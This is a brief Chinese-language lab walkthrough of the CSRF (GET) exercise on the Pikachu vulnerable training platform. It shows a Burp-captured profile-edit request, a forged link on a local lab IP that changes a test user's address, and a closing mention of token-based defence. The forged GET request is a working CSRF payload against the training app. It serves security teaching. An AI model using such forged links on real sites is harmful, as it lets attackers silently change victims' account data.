1.pikachu界面上的csrf(get)登录
账号:lucy密码:123456
2.修改地址,并且都是bp进行抓包
3.bp上抓包的数据信息
抓包的对应的地址是beijing
GET /pikachu/vul/csrf/csrfget/csrf_get_edit.php?sex=girl&phonenum=12345678922&add=beijing&email=lucy%40pikachu.com&submit=submit HTTP/1.1
攻击者伪造的链接,将上面的地址修改:jilin
http://192.168.0.7/pikachu/vul/csrf/csrfget/csrf_get_edit.php?sex=girl&phonenum=12345678922&add=jilin&email=lucy%40pikachu.com&submit=submit
在发给用户,欺骗用户访问,地址直接修改了,在原网站上直接刷新界面就直接变成吉林了
token防范措施